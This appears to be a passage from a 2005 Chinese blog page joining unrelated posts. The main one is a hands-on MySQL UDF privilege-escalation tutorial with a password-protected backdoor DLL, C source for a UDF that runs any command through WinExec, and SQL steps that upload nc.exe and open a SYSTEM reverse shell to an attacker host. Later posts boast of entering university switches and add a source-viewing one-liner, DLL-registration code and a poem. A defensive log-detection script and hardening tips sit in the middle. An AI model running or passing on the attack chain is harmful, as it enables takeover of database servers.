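Mysql> select my_udfdoor(''); //the argument to my_udfdoor can be anything; we only need to activate the function

Now, without closing this shell, open another cmd and use:

D:\>nc hostip 3306

*

4.0.*-nt x$Eo~MCG fuck //after you see this, type "fuck"; it is my_udfdoor's default password and cannot be changed

After a while you have a shell with system privileges; see Figure 3.

Because it is the "hook recv" version, it is very good at getting through firewalls. I used it after the mix.dll reverse connection had failed, and it did not disappoint! After getting into the system I found it had two network cards and Skynet Personal Firewall (天网防火墙个人版) V2.73, with only port 3306 open to the outside, which shows that my_udf.dll really does penetrate firewalls well! But it has a bug too: once the function has been activated over our connection (that is, after the command "select my_udfdoor('');" has been used), whether or not you are connected, as soon as you run:

Mysql>drop function my_udfdoor; MySQL again reports an error and dies; see Figure 4.

So with this DLL file you cannot remove your traces!

Finally, let's write a custom DLL file ourselves and see whether that solves the problem.

We only need the MySQL UDF sample as a template! Here is the sample: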

#include <stdlib.h>

#include <winsock.h>

#include <mysql.h>

extern "C" {

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

       char *error);

// C-compatible linkage

}

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

       char *error)

{

    char * me = "my name";

    return me;

    // calling this UDF returns "my name"

}

Very simple, right? Good, a small change gives us our own DLL file:

Below is the version modified by my friend Crackme:

#include <stdlib.h>

#include <windows.h>

#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name is the function name; you can change it to anything

 

 

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) // of course sys_name here has to be changed as well!

{

    char me[256] = {0};

if (args->arg_count == 1){

        strncpy(me,args->args[0],args->lengths[0]);

        me[args->lengths[0]]='\0';

        WinExec(me,SW_HIDE); // this is what executes arbitrary commands

}else

        strcpy(me,"do nonthing.\n");

 

 

    return me;

}

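We compile it into sysudf.dll and that's it! Let's try it out!

The steps:

Mysql>\. C:\sysudf.dll.txt

Mysql>Create function sys_name returns string soname 'C:\\windows\\sysudf.dll';

Mysql>\. Nc.exe.txt //upload nc.exe as well

Mysql>select sys_name('nc.exe -e cmd.exe my-ip 8080');

//sys_name takes a single argument, which specifies the system command to execute

Here is a reverse shell on Win2003; see Figure 5.

Of course, you do not have to get a reverse shell; you can run other commands instead. However, whether or not the command succeeds, there is no output echoed back, so make sure the command is correctly formed. Testing shows that with this DLL file "drop function sys_name;" never produces an error whenever it is run, and different commands can be run many times. Its weakness is that, like Mix.dll, it is not very good at getting through firewalls, but against a firewall that really cannot be penetrated, running other commands directly is the best choice.

Each of the three DLL files has its shortcomings; which to choose depends on the situation you actually face.

That covers everything from writing and using the script to writing and using the DLL files; after all this, everyone should have it by now, right? The title says system privileges from a weak password, but if the MySQL password in config.php is exposed during injection or some other process, can't it be used just the same? Haven't we then found another major privilege-escalation method after Serv-u?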
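
From the defender's side, the three steps the article walks through (hex data accumulated into a user variable, a file written with INTO DUMPFILE, a function registered with SONAME) each leave a distinctive statement in MySQL's query logging. The following is an added example, not part of the article: it scans constructed log records, groups hits by connection and grades the result. The record layout, names and severity labels are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample records: (connection id, account, statement).
HEX = "0x" + "ab" * 32          # placeholder hex literal, not real file data
SAMPLE_LOG = [
    (41, "app@10.0.0.5", "select id, title from news where id = 7"),
    (57, "root@203.0.113.9", "set @a = concat('', " + HEX + ")"),
    (57, "root@203.0.113.9", "set @a = concat(@a, " + HEX + ")"),
    (57, "root@203.0.113.9", "create table t1(data LONGBLOB)"),
    (57, "root@203.0.113.9",
     "select data from t1 into DUMPFILE 'C:\\\\Windows\\\\example.dll'"),
    (57, "root@203.0.113.9",
     "CREATE FUNCTION example_fn RETURNS STRING SONAME 'C:\\\\Windows\\\\example.dll'"),
    (63, "backup@10.0.0.8",
     "select * from orders into outfile '/var/backup/orders.csv'"),
]

RULES = [
    # Long hex literal appended to a user variable via concat().
    ("hex_staging",
     re.compile(r"\bset\s+@\w+\s*=\s*concat\s*\([^)]*0x[0-9a-f]{32,}", re.I)),
    # Raw binary export of a column to a file on the server.
    ("dumpfile_write",
     re.compile(r"\binto\s+dumpfile\s+'([^']+)'", re.I)),
    # Registration of a user-defined function from a shared library.
    ("udf_register",
     re.compile(r"\bcreate\s+(?:aggregate\s+)?function\s+\w+\s+returns\s+\w+"
                r"\s+soname\s+'([^']+)'", re.I)),
]


def scan(records):
    """Return {connection id: [(stage, file path or ''), ...]} in log order."""
    hits = defaultdict(list)
    for conn, _account, stmt in records:
        for stage, rx in RULES:
            m = rx.search(stmt)
            if m:
                hits[conn].append((stage, m.group(1) if m.groups() else ""))
    return dict(hits)


def classify(stages):
    """Grade one connection's hits; the full chain is the strongest signal."""
    names = [s for s, _ in stages]
    if "udf_register" in names:
        written = {p.lower() for s, p in stages if s == "dumpfile_write"}
        libs = {p.lower() for s, p in stages if s == "udf_register"}
        return "critical" if libs & written else "high"
    if "dumpfile_write" in names:
        return "medium"
    return "low"


if __name__ == "__main__":
    for conn, stages in scan(SAMPLE_LOG).items():
        print(conn, classify(stages), stages)
```

Restricting the FILE privilege, setting secure_file_priv, and running the MySQL service under a low-privilege account remove the preconditions the article relies on; the mysql.func table lists the functions that have been registered.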

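       I have known for a long time that many of Jilin University's servers have very serious security problems; Windows or *nix, they are full of problems. But this is not entirely the network center's fault: after all, they cannot configure every single server themselves.

        Yet with the ability of someone who has only just finished CCNA training, today I easily got into a dozen or so of Jilin University's switches. I am a beginner with this equipment and cannot do much with it, but I could surely cut off the network for a building. Someone with a little more skill could use them as stepping stones, couldn't they? Think about it: if a beginner can easily get into so many of the university's devices, what would happen with a malicious attacker?

        To the network staff of Jilin University: I know that keeping such a large network running is very demanding, but since you have chosen this job, please fulfil your duty and give the university's staff and students a network environment whose security can be relied on!

July 16, 2005

Defeating so-called "web page source code encryption"
In the address bar, or after pressing Ctrl+O, enter:

javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;

and the source code appears. However complex the "encryption", it ultimately has to be restored to HTML that the browser can parse, and documentElement.outerHTML is exactly that final result.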

July 15, 2005

How do I register and unregister a DLL?



regsvr32 dllname.dll
regsvr32/u dllname.dll



up



' Requires Declare statements for GetSystemDirectory, OpenProcess, GetExitCodeProcess,
' CloseHandle, CLSIDFromProgID, StringFromCLSID and CoTaskMemFree, plus the tp_GUID type,
' the GetComString helper and the MAX_PATH, PROCESS_QUERY_INFORMATION and STATUS_PENDING
' constants, none of which are shown in this post.
Function RegisterDll(strDllFileName As String, strProgID As String, strClsID As String, Optional bVerify As Boolean = True) As Long
' Description
'     Registers an ActiveX DLL.
'     Verification: if strProgID is not empty, after registration check whether the CLSID
'     for strProgID equals strCLSID; if not, registration is considered to have failed.

' Parameters
'     strDllFileName    :(in) DLL file name, including path
'     strProgID         :(in) ProgID, e.g. "AutoYuanjuanProject.AutoYuejuan"
'     strCLSID          :(in) CLSID, e.g. "37048527-7337-43A8-A041-18DDA083F9F3"
'     bVerify           :(in) whether to verify that registration succeeded; default is yes

' Return value
'     0 = OK
'     1 = runtime error

' Algorithm / program flow
'     1. regsvr32 /s /u .dll
'     2. regsvr32 /s .dll
'     3. CLSIDFromProgID
'     4. StringFromCLSID
'     5. Compare the CLSID string with strCLSID; if they match, registration succeeded
   Dim strSystemPath       As String
   Dim strRegsvr32         As String
   Dim strCmdLine          As String
   Dim lnProcess           As Long
   Dim lnProcessID         As Long
   Dim lnExitCode          As Long
   Dim sgStartTimer        As Single
   Dim tClsID              As tp_GUID
   Dim pOLESTR             As Long
   Dim strNewClsID         As String
   Dim lnReturn            As Long
   Dim ln1                 As Long

   On Error GoTo err_RegisterDll

   ' Get the system directory
   strSystemPath = String(MAX_PATH, Chr(0))
   lnReturn = GetSystemDirectory(strSystemPath, MAX_PATH)
   If lnReturn > 0 Then
      strSystemPath = Left(strSystemPath, lnReturn)
   Else
      ' Failed to get the system directory
      RegisterDll = 1
      Exit Function
   End If
   If Right(strSystemPath, 1) <> "\" Then strSystemPath = strSystemPath & "\"

   ' Build the full path of regsvr32.exe
   strRegsvr32 = strSystemPath & "regsvr32.exe"

   ' Register the DLL (the path is quoted so that a name containing spaces
   ' is passed to regsvr32 as a single argument)
   'strCmdLine = strRegsvr32 & " /s " & strDllFileName
   strCmdLine = strRegsvr32 & " /s """ & strDllFileName & """"
   lnProcessID = Shell(strCmdLine, vbNormalFocus)
   If lnProcessID = 0 Then
      ' Failed to run
      RegisterDll = 1
      Exit Function
   End If

   lnProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, lnProcessID)
   If lnProcess <> 0 Then
      sgStartTimer = Timer
      Do
          Call GetExitCodeProcess(lnProcess, lnExitCode)
          DoEvents
          DoEvents
          DoEvents
      Loop While (lnExitCode = STATUS_PENDING) And (Timer - sgStartTimer < 5)    ' 5-second timeout
      CloseHandle lnProcess
      If lnExitCode = STATUS_PENDING Then
         ' regsvr32 timed out
         RegisterDll = 1
         Exit Function
      End If
   End If

   ' Verify the registration result
   If Not bVerify Then
      RegisterDll = 0
      Exit Function
   Else
      ' Look up CLSIDFromProgID
      If strProgID = "" Then
         ' Skip the ProgID / CLSID check
         RegisterDll = 0
         Exit Function
      End If
      lnReturn = CLSIDFromProgID(StrPtr(strProgID), tClsID)
      If lnReturn <> 0 Then
         ' Failed to run
         RegisterDll = 1
         Exit Function
      End If

      ' Convert with StringFromCLSID
      strNewClsID = String(160, Chr(0))
      lnReturn = StringFromCLSID(tClsID, pOLESTR)
      If lnReturn <> 0 Then
         ' Failed to run
         RegisterDll = 1
         Exit Function
      End If
      If GetComString(pOLESTR, 100, strNewClsID) <> 0 Then
         ' Failed to run
         CoTaskMemFree pOLESTR
         RegisterDll = 1
         Exit Function
      End If
      CoTaskMemFree pOLESTR

      ' Compare the CLSID string with strCLSID; if they match, registration succeeded
      If strNewClsID = strClsID Then
         RegisterDll = 0
         Exit Function
      Else
         RegisterDll = 1
         Exit Function
      End If
   End If

err_RegisterDll:

   RegisterDll = 1

'debug
'MsgBox "err_RegisterDll"
'Err.Clear
'On Error GoTo err_RegisterDll
'Resume Next
End Function
Function UnRegisterDll(strDllFileName As String) As Long
' Description
'     Unregisters an ActiveX DLL

' Parameters
'     strDllFileName    :(in) DLL file name, including path

' Return value
'     0 = OK
'     1 = runtime error

' Algorithm / program flow
'     1 regsvr32 /s /u .dll
   Dim strSystemPath       As String
   Dim strRegsvr32         As String
   Dim strCmdLine          As String
   Dim lnReturn            As Long
   Dim lnProcessID         As Long

   On Error GoTo err_UnRegisterDll

   ' Get the system directory
   strSystemPath = String(MAX_PATH, Chr(0))
   lnReturn = GetSystemDirectory(strSystemPath, MAX_PATH)
   If lnReturn > 0 Then
      strSystemPath = Left(strSystemPath, lnReturn)
   Else
      ' Failed to get the system directory
      UnRegisterDll = 1
      Exit Function
   End If
   If Right(strSystemPath, 1) <> "\" Then strSystemPath = strSystemPath & "\"

   ' Build the full path of regsvr32.exe
   strRegsvr32 = strSystemPath & "regsvr32.exe"

   ' Unregister the DLL (path quoted, as in RegisterDll, so that a name
   ' containing spaces is passed to regsvr32 as a single argument)
   strCmdLine = strRegsvr32 & " /s /u """ & strDllFileName & """"
   lnProcessID = Shell(strCmdLine, vbNormalFocus)
   If lnProcessID = 0 Then
      ' Failed to run
      UnRegisterDll = 1
      Exit Function
   End If

   UnRegisterDll = 0
   Exit Function

err_UnRegisterDll:
   UnRegisterDll = 1

End Function

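July 14, 2005

Men respect women because it was a woman's ten months of pregnancy and flesh-tearing pain that gave men their lives……

Men cherish women because a woman's ten months of pregnancy and flesh-tearing pain let men's lives continue once more….

Women respect women because women, too, go through ten months of pregnancy and torn flesh to become mothers….

Women cherish women because only women can understand and feel for women…

And what holds all of this together is a mother's love…. a selfless, supreme feeling,

Before you, tears fall silent; before you, words lose their strength….

I love you, Mom…..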